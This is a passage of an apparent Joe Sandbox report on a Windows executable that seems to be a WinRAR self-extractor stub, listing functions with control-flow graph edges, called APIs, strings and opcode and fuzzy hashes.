7ff6fe1b1b30-7ff6fe1b1b43 GetLastError 1941->1946 1955 7ff6fe1b1bb5 1942->1955 1943->1942 1944->1922 1945->1935 1945->1944 1951 7ff6fe1b1b45-7ff6fe1b1b58 1946->1951 1952 7ff6fe1b1b5a-7ff6fe1b1b81 call 7ff6fe1b1868 RaiseException call 7ff6fe1b1558 1946->1952 1947->1941 1953 7ff6fe1b1b01-7ff6fe1b1b08 1947->1953 1951->1932 1951->1952 1952->1932 1953->1941 1957 7ff6fe1b1b0a-7ff6fe1b1b0f 1953->1957 1955->1922 1957->1941 1960 7ff6fe1b1b11-7ff6fe1b1b19 1957->1960 1960->1932 1960->1941
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: DloadSection$AccessExceptionProtectRaiseReleaseWrite$ErrorLastLibraryLoad
                                                                                        • String ID: H
                                                                                        • API String ID: 3432403771-2852464175
                                                                                        • Opcode ID: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
                                                                                        • Instruction ID: 4f1ade378998ee1fcaaaafe619b67ae18bb804e9013172906a4e28ec393246d7
                                                                                        • Opcode Fuzzy Hash: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
                                                                                        • Instruction Fuzzy Hash: 28914C22F15B618AFB10CF66D9806AC37B5BB98B98B454436EE2D97794FF38E445C300
                                                                                        Function 00007FF6FE1AF4E0 Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 285COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1988 7ff6fe1af4e0-7ff6fe1af523 1989 7ff6fe1af894-7ff6fe1af8b9 call 7ff6fe181fa0 call 7ff6fe1b2320 1988->1989 1990 7ff6fe1af529-7ff6fe1af565 call 7ff6fe1b3cf0 1988->1990 1996 7ff6fe1af567 1990->1996 1997 7ff6fe1af56a-7ff6fe1af571 1990->1997 1996->1997 1998 7ff6fe1af582-7ff6fe1af586 1997->1998 1999 7ff6fe1af573-7ff6fe1af577 1997->1999 2003 7ff6fe1af588 1998->2003 2004 7ff6fe1af58b-7ff6fe1af596 1998->2004 2001 7ff6fe1af579 1999->2001 2002 7ff6fe1af57c-7ff6fe1af580 1999->2002 2001->2002 2002->2004 2003->2004 2005 7ff6fe1af628 2004->2005 2006 7ff6fe1af59c 2004->2006 2008 7ff6fe1af62c-7ff6fe1af62f 2005->2008 2007 7ff6fe1af5a2-7ff6fe1af5a9 2006->2007 2009 7ff6fe1af5ae-7ff6fe1af5b3 2007->2009 2010 7ff6fe1af5ab 2007->2010 2011 7ff6fe1af631-7ff6fe1af635 2008->2011 2012 7ff6fe1af637-7ff6fe1af63a 2008->2012 2013 7ff6fe1af5e5-7ff6fe1af5f0 2009->2013 2014 7ff6fe1af5b5 2009->2014 2010->2009 2011->2012 2015 7ff6fe1af660-7ff6fe1af673 call 7ff6fe1963ac 2011->2015 2012->2015 2016 7ff6fe1af63c-7ff6fe1af643 2012->2016 2018 7ff6fe1af5f5-7ff6fe1af5fa 2013->2018 2019 7ff6fe1af5f2 2013->2019 2020 7ff6fe1af5ca-7ff6fe1af5d0 2014->2020 2027 7ff6fe1af675-7ff6fe1af693 call 7ff6fe1a13c4 2015->2027 2028 7ff6fe1af698-7ff6fe1af6ed call 7ff6fe1b797c call 7ff6fe18129c call 7ff6fe1932a8 call 7ff6fe181fa0 2015->2028 2016->2015 2021 7ff6fe1af645-7ff6fe1af65c 2016->2021 2023 7ff6fe1af600-7ff6fe1af607 2018->2023 2024 7ff6fe1af8ba-7ff6fe1af8c1 2018->2024 2019->2018 2025 7ff6fe1af5d2 2020->2025 2026 7ff6fe1af5b7-7ff6fe1af5be 2020->2026 2021->2015 2029 7ff6fe1af609 2023->2029 2030 7ff6fe1af60c-7ff6fe1af612 2023->2030 2033 7ff6fe1af8c3 2024->2033 2034 7ff6fe1af8c6-7ff6fe1af8cb 2024->2034 2025->2013 2031 7ff6fe1af5c0 2026->2031 2032 7ff6fe1af5c3-7ff6fe1af5c8 2026->2032 2027->2028 2055 7ff6fe1af6ef-7ff6fe1af73d call 7ff6fe1b797c call 7ff6fe18129c call 7ff6fe195b60 call 7ff6fe181fa0 2028->2055 2056 7ff6fe1af742-7ff6fe1af74f ShellExecuteExW 2028->2056 2029->2030 2030->2024 2039 7ff6fe1af618-7ff6fe1af622 2030->2039 2031->2032 2032->2020 2040 7ff6fe1af5d4-7ff6fe1af5db 2032->2040 2033->2034 2035 7ff6fe1af8de-7ff6fe1af8e6 2034->2035 2036 7ff6fe1af8cd-7ff6fe1af8d4 2034->2036 2045 7ff6fe1af8e8 2035->2045 2046 7ff6fe1af8eb-7ff6fe1af8f6 2035->2046 2043 7ff6fe1af8d9 2036->2043 2044 7ff6fe1af8d6 2036->2044 2039->2005 2039->2007 2041 7ff6fe1af5e0 2040->2041 2042 7ff6fe1af5dd 2040->2042 2041->2013 2042->2041 2043->2035 2044->2043 2045->2046 2046->2008 2055->2056 2058 7ff6fe1af755-7ff6fe1af75f 2056->2058 2059 7ff6fe1af846-7ff6fe1af84e 2056->2059 2063 7ff6fe1af761-7ff6fe1af764 2058->2063 2064 7ff6fe1af76f-7ff6fe1af772 2058->2064 2061 7ff6fe1af850-7ff6fe1af866 2059->2061 2062 7ff6fe1af882-7ff6fe1af88f 2059->2062 2066 7ff6fe1af868-7ff6fe1af87b 2061->2066 2067 7ff6fe1af87d call 7ff6fe1b220c 2061->2067 2062->1989 2063->2064 2068 7ff6fe1af766-7ff6fe1af76d 2063->2068 2069 7ff6fe1af78e-7ff6fe1af7ad call 7ff6fe1ee1b8 call 7ff6fe1afe24 2064->2069 2070 7ff6fe1af774-7ff6fe1af77f call 7ff6fe1ee188 2064->2070 2066->2067 2073 7ff6fe1af8fb-7ff6fe1af903 call 7ff6fe1b7904 2066->2073 2067->2062 2068->2064 2075 7ff6fe1af7e3-7ff6fe1af7f0 CloseHandle 2068->2075 2069->2075 2096 7ff6fe1af7af-7ff6fe1af7b2 2069->2096 2070->2069 2083 7ff6fe1af781-7ff6fe1af78c ShowWindow 2070->2083 2080 7ff6fe1af805-7ff6fe1af80c 2075->2080 2081 7ff6fe1af7f2-7ff6fe1af803 call 7ff6fe1a13c4 2075->2081 2088 7ff6fe1af82e-7ff6fe1af830 2080->2088 2089 7ff6fe1af80e-7ff6fe1af811 2080->2089 2081->2080 2081->2088 2083->2069 2088->2059 2090 7ff6fe1af832-7ff6fe1af835 2088->2090 2089->2088 2094 7ff6fe1af813-7ff6fe1af828 2089->2094 2090->2059 2095 7ff6fe1af837-7ff6fe1af845 ShowWindow 2090->2095 2094->2088 2095->2059 2096->2075 2098 7ff6fe1af7b4-7ff6fe1af7c5 GetExitCodeProcess 2096->2098 2098->2075 2099 7ff6fe1af7c7-7ff6fe1af7dc 2098->2099 2099->2075
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_invalid_parameter_noinfo_noreturn
                                                                                        • String ID: .exe$.inf$Install$p
                                                                                        • API String ID: 1054546013-3607691742
                                                                                        • Opcode ID: db8ecbd514ff322f29a974296a08b1056670a56b0f2c036ad5285174391dee78
                                                                                        • Instruction ID: 0ddc5047bde74e7120ae0eb628d826ebee3245187aa46fa1ab23244735e78f70
                                                                                        • Opcode Fuzzy Hash: db8ecbd514ff322f29a974296a08b1056670a56b0f2c036ad5285174391dee78
                                                                                        • Instruction Fuzzy Hash: 16C17162F49A0295FB10DB67D9442792B61BFE9B84F044035EA6D87AE5FF3CE499C300
                                                                                        Function 00007FF6FE1AF0A4 Relevance: 16.6, APIs: 11, Instructions: 102windowCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3569833718-0
                                                                                        • Opcode ID: 6d17268858d6b6aed380ad60cc2cf8b16547cb3a0c40a3112c59011326a33119
                                                                                        • Instruction ID: 9bcdc544271fbbfaf71c1924875d6759b058df915a3b9a48f7d6dd9db92b1025
                                                                                        • Opcode Fuzzy Hash: 6d17268858d6b6aed380ad60cc2cf8b16547cb3a0c40a3112c59011326a33119
                                                                                        • Instruction Fuzzy Hash: 37418B21F14A4286F710CF62E810BAA2BA0EBD9B98F441135FD2A87FD5DE7DE4498744
                                                                                        Function 00007FF6FE1AA440 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 257COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2675 7ff6fe1aa440-7ff6fe1aa479 2676 7ff6fe1aa47f-7ff6fe1aa56e call 7ff6fe1acdf8 call 7ff6fe1b797c call 7ff6fe18129c call 7ff6fe1b797c call 7ff6fe18129c call 7ff6fe1b797c call 7ff6fe18129c call 7ff6fe1aa834 2675->2676 2677 7ff6fe1aa70b-7ff6fe1aa72e call 7ff6fe1b2320 2675->2677 2695 7ff6fe1aa573-7ff6fe1aa575 2676->2695 2696 7ff6fe1aa577-7ff6fe1aa57b 2695->2696 2697 7ff6fe1aa57d 2695->2697 2696->2697 2698 7ff6fe1aa580-7ff6fe1aa58d 2696->2698 2697->2698 2699 7ff6fe1aa5c1-7ff6fe1aa5db 2698->2699 2700 7ff6fe1aa58f-7ff6fe1aa5a1 2698->2700 2701 7ff6fe1aa60f-7ff6fe1aa629 2699->2701 2702 7ff6fe1aa5dd-7ff6fe1aa5ef 2699->2702 2703 7ff6fe1aa5a3-7ff6fe1aa5b6 2700->2703 2704 7ff6fe1aa5bc call 7ff6fe1b220c 2700->2704 2709 7ff6fe1aa65d-7ff6fe1aa660 2701->2709 2710 7ff6fe1aa62b-7ff6fe1aa63d 2701->2710 2707 7ff6fe1aa5f1-7ff6fe1aa604 2702->2707 2708 7ff6fe1aa60a call 7ff6fe1b220c 2702->2708 2703->2704 2705 7ff6fe1aa735-7ff6fe1aa73a call 7ff6fe1b7904 2703->2705 2704->2699 2712 7ff6fe1aa73b-7ff6fe1aa740 call 7ff6fe1b7904 2705->2712 2707->2708 2707->2712 2708->2701 2716 7ff6fe1aa662-7ff6fe1aa669 2709->2716 2717 7ff6fe1aa686-7ff6fe1aa68e 2709->2717 2714 7ff6fe1aa63f-7ff6fe1aa652 2710->2714 2715 7ff6fe1aa658 call 7ff6fe1b220c 2710->2715 2722 7ff6fe1aa741-7ff6fe1aa746 call 7ff6fe1b7904 2712->2722 2714->2715 2714->2722 2715->2709 2716->2717 2724 7ff6fe1aa66b-7ff6fe1aa685 call 7ff6fe1820b0 2716->2724 2718 7ff6fe1aa690-7ff6fe1aa6a2 2717->2718 2719 7ff6fe1aa6c2-7ff6fe1aa6db 2717->2719 2725 7ff6fe1aa6a4-7ff6fe1aa6b7 2718->2725 2726 7ff6fe1aa6bd call 7ff6fe1b220c 2718->2726 2719->2677 2728 7ff6fe1aa6dd-7ff6fe1aa6ef 2719->2728 2732 7ff6fe1aa747-7ff6fe1aa797 call 7ff6fe1b7904 call 7ff6fe18255c 2722->2732 2724->2717 2725->2726 2725->2732 2726->2719 2734 7ff6fe1aa6f1-7ff6fe1aa704 2728->2734 2735 7ff6fe1aa706 call 7ff6fe1b220c 2728->2735 2745 7ff6fe1aa812 2732->2745 2746 7ff6fe1aa799-7ff6fe1aa79f 2732->2746 2734->2735 2737 7ff6fe1aa72f-7ff6fe1aa734 call 7ff6fe1b7904 2734->2737 2735->2677 2737->2705 2749 7ff6fe1aa817-7ff6fe1aa832 call 7ff6fe1b2320 2745->2749 2747 7ff6fe1aa801-7ff6fe1aa80c SetDlgItemTextW 2746->2747 2748 7ff6fe1aa7a1-7ff6fe1aa7a4 2746->2748 2747->2745 2751 7ff6fe1aa7b1-7ff6fe1aa7b3 2748->2751 2752 7ff6fe1aa7a6-7ff6fe1aa7ab 2748->2752 2751->2749 2754 7ff6fe1aa7c2-7ff6fe1aa7ff call 7ff6fe1ee170 call 7ff6fe19bb00 call 7ff6fe19bb70 2752->2754 2755 7ff6fe1aa7ad-7ff6fe1aa7af 2752->2755 2758 7ff6fe1aa7b7-7ff6fe1aa7c0 EndDialog 2754->2758 2755->2751 2756 7ff6fe1aa7b5 2755->2756 2756->2758 2758->2745
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskDialogOpen
                                                                                        • String ID: GETPASSWORD1$Software\WinRAR SFX
                                                                                        • API String ID: 2300675366-1315819833
                                                                                        • Opcode ID: 492748e4b920a0caf0e9a60e4b7f93ee9a00f1d6e92b46c97eb4ea70364b9bd5
                                                                                        • Instruction ID: 7547198be0ae91e6d9f90c7cc4c3e84c0ed6080d099bfe51f907b0c43f882e80
                                                                                        • Opcode Fuzzy Hash: 492748e4b920a0caf0e9a60e4b7f93ee9a00f1d6e92b46c97eb4ea70364b9bd5
                                                                                        • Instruction Fuzzy Hash: BBB1CF62F5974285FB00DBA6D4442BD2762ABE5794F404335EA2DA7BD9FE3CE14AC300
                                                                                        Function 00007FF6FE18EF10 Relevance: 11.0, APIs: 7, Instructions: 453COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 3668304517-0
                                                                                        • Opcode ID: 6469fcd7a18d79184505e1ddd466699231e2121c09bb10067de1f33c8494aa65
                                                                                        • Instruction ID: 9a520f9b3a5fb1afe74692457ebf1eed78ee5a8ca9caba340cf9d3859897a41f
                                                                                        • Opcode Fuzzy Hash: 6469fcd7a18d79184505e1ddd466699231e2121c09bb10067de1f33c8494aa65
                                                                                        • Instruction Fuzzy Hash: 4712B562F1C74584EB10CB66D4442AD2762EBE97A8F400232EE6D97BD9EF3CD649C300
                                                                                        Function 00007FF6FE1924C0 Relevance: 9.2, APIs: 6, Instructions: 164filetimeCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 3907 7ff6fe1924c0-7ff6fe1924fb 3908 7ff6fe192506 3907->3908 3909 7ff6fe1924fd-7ff6fe192504 3907->3909 3910 7ff6fe192509-7ff6fe192578 3908->3910 3909->3908 3909->3910 3911 7ff6fe19257a 3910->3911 3912 7ff6fe19257d-7ff6fe1925a8 CreateFileW 3910->3912 3911->3912 3913 7ff6fe1925ae-7ff6fe1925de GetLastError call 7ff6fe196a0c 3912->3913 3914 7ff6fe192688-7ff6fe19268d 3912->3914 3923 7ff6fe1925e0-7ff6fe19262a CreateFileW GetLastError 3913->3923 3924 7ff6fe19262c 3913->3924 3915 7ff6fe192693-7ff6fe192697 3914->3915 3917 7ff6fe1926a5-7ff6fe1926a9 3915->3917 3918 7ff6fe192699-7ff6fe19269c 3915->3918 3921 7ff6fe1926cf-7ff6fe1926e3 3917->3921 3922 7ff6fe1926ab-7ff6fe1926af 3917->3922 3918->3917 3920 7ff6fe19269e 3918->3920 3920->3917 3927 7ff6fe1926e5-7ff6fe1926f0 3921->3927 3928 7ff6fe19270c-7ff6fe192735 call 7ff6fe1b2320 3921->3928 3922->3921 3926 7ff6fe1926b1-7ff6fe1926c9 SetFileTime 3922->3926 3925 7ff6fe192632-7ff6fe19263a 3923->3925 3924->3925 3931 7ff6fe192673-7ff6fe192686 3925->3931 3932 7ff6fe19263c-7ff6fe192653 3925->3932 3926->3921 3929 7ff6fe1926f2-7ff6fe1926fa 3927->3929 3930 7ff6fe192708 3927->3930 3934 7ff6fe1926ff-7ff6fe192703 call 7ff6fe1820b0 3929->3934 3935 7ff6fe1926fc 3929->3935 3930->3928 3931->3915 3936 7ff6fe19266e call 7ff6fe1b220c 3932->3936 3937 7ff6fe192655-7ff6fe192668 3932->3937 3934->3930 3935->3934 3936->3931 3937->3936 3940 7ff6fe192736-7ff6fe19273b call 7ff6fe1b7904 3937->3940
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 3536497005-0
                                                                                        • Opcode ID: 731a06aeb1aeb45fbab96b045eb79c55c759261894fecd14d272f4e3d7f6f85d
                                                                                        • Instruction ID: 95e3f35a4e0268eacb1fa4e67d85726d6f9719c1a6511907a696b505c57bb228
                                                                                        • Opcode Fuzzy Hash: 731a06aeb1aeb45fbab96b045eb79c55c759261894fecd14d272f4e3d7f6f85d
                                                                                        • Instruction Fuzzy Hash: 1261A166E1864185F720CB2AF54036E6BA1BBD57A8F101334EEB983AD8EF3DD059C744
                                                                                        Function 00007FF6FE1AFA80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82registryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCreateValue_invalid_parameter_noinfo_noreturn
                                                                                        • String ID: Software\WinRAR SFX
                                                                                        • API String ID: 207320342-754673328
                                                                                        • Opcode ID: 8ab1c68a47c8c2e508d57e535803f187fdd9f05ec423ba246173c715412dd5f9
                                                                                        • Instruction ID: dad360b300e5b0ae275339332f9b7596f08e86d2b973cac42b2e4063a4c648e8
                                                                                        • Opcode Fuzzy Hash: 8ab1c68a47c8c2e508d57e535803f187fdd9f05ec423ba246173c715412dd5f9
                                                                                        • Instruction Fuzzy Hash: 20414672E04A4589EB20CF26E4546A937A5FBD8798F401635FA6D83BD8EF7CD158C700
                                                                                        Function 00007FF6FE1AB014 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54windowCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$Resource$Object$AllocBitmapCreateDeleteGdipLoadLock$FindFreeFromSizeofStreamUnlock
                                                                                        • String ID: ]
                                                                                        • API String ID: 3561356813-3352871620
                                                                                        • Opcode ID: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
                                                                                        • Instruction ID: 0e7add47ae3c0bfa1c523fd4e41ccf88122c007ab42dd1903a463563a8256375
                                                                                        • Opcode Fuzzy Hash: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
                                                                                        • Instruction Fuzzy Hash: 4C114221F4968241FB74DB13A65467D5AA1AFE8FC0F080034F96D87BD9FE6DE8488600
                                                                                        Function 00007FF6FE1AAE1C Relevance: 7.5, APIs: 5, Instructions: 27windowCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$DialogDispatchPeekTranslate
                                                                                        • String ID:
                                                                                        • API String ID: 1266772231-0
                                                                                        • Opcode ID: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
                                                                                        • Instruction ID: 16ff9fe5f1bf521fb8c40e3fd0d951f33d533ea5a9dd50cd050b8fbf73d07bfc
                                                                                        • Opcode Fuzzy Hash: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
                                                                                        • Instruction Fuzzy Hash: EFF0EC25E3894282FB50DB22EC95A362761BFE4B05F805535F65E81C94EF6CE549CB00
                                                                                        Function 00007FF6FE1A91E8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
